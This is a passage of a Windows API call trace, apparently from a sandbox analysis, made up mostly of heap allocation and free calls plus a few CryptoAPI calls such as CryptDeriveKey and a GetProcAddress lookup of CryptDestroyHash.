(HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0161.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0161.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0161.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0161.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0161.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0161.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0161.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0161.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0161.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e509e0 [0161.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e509e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0161.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0161.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0161.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0161.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0161.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0161.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0161.882] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa872d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87310) returned 1 [0161.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0161.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0161.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0161.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0161.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0161.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0161.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0161.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0161.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0161.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0161.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0161.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0161.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0161.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0161.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0161.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0161.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0161.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0161.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0161.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0161.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0161.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0161.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0161.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0161.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0161.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0161.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0161.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0161.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0161.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0161.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0161.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0161.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0161.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0161.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0161.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0161.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0161.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0161.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0161.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0161.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0161.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0161.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0161.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0161.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0161.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0161.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0161.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0161.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0161.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0161.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0161.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0161.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0161.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0161.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0161.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0161.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0161.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0161.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0161.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0161.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0161.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0161.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0161.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0161.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0161.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0161.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0161.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0161.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0161.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0161.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0161.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0161.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0161.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0161.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0161.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0161.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0161.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0161.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0161.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0161.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0161.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0161.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0161.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0161.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0161.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0161.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0161.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0161.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0161.886] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0161.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0161.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0161.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0161.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0161.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0161.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0161.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0161.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0161.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0161.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0161.887] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0161.887] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0161.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0161.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0161.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0161.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0161.887] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0161.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0161.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0161.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0161.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0161.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0161.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0161.887] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0161.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0161.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0161.887] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0161.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0161.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0161.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0161.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0161.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0161.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0161.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0161.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0161.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0161.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0161.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0161.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0161.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0161.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0161.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0161.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0161.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0161.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0161.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0161.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0161.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0161.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0161.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0161.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0161.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0161.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0161.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c20 [0161.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a88 [0161.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0161.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b30 [0161.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50bf0 [0161.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0161.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0161.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0161.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0161.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0161.889] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0161.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0161.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cb0 [0161.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0161.889] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0161.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0161.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0161.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0161.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0161.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0161.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0161.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0161.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0161.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0161.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0161.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0161.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0161.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0161.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0161.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0161.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0161.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0161.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0161.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0161.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0161.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0161.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0161.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0161.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0161.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0161.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0161.891] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0161.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0161.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0161.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0161.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0161.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0161.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0161.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0161.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0161.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0161.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0161.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0161.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0161.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0161.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0161.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0161.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0161.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0161.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0161.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0161.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0161.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69a68 [0161.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0161.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0161.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0161.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0161.892] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0161.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0161.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0161.892] 